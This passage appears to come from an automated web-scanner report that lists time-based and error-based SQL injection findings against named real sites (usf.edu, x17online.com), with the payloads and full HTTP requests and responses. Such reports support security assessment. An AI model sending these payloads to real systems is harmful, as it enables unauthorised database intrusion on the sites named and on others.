The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20192 milliseconds to respond to the request, compared with 49 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-info'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:56:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSRSTRAB=DNBJAMADIENPAGGEAJEJHAOO; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head>
       <meta
...[SNIP]...

1.18. http://www.usf.edu/server-info [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usf.edu
Path:   /server-info

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 20194 milliseconds to respond to the request, compared with 49 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-info?1'waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:54:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSRSTRAB=AJBJAMADIEKOLOGDIBAHAPEE; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head>
       <meta
...[SNIP]...

1.19. http://www.usf.edu/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usf.edu
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20233 milliseconds to respond to the request, compared with 50 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-status'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSCBACQA=CECKKBBDAIJFLPOLOBMEBOKM; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head>
       <meta
...[SNIP]...

1.20. http://www.usf.edu/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usf.edu
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 20180 milliseconds to respond to the request, compared with 50 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-status?1'waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:28:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSCBACQA=OPBKKBBDICKKJIJNMFJCGNLO; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head>
       <meta
...[SNIP]...

1.21. http://www.x17online.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x17online.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.x17online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not found
Date: Sat, 02 Apr 2011 02:27:10 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1787

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/') or (fileinfo_url like '/server-status'/index%'))
and bl' at line 5</font>
...[SNIP]...

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.x17online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not found
Date: Sat, 02 Apr 2011 02:27:10 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...
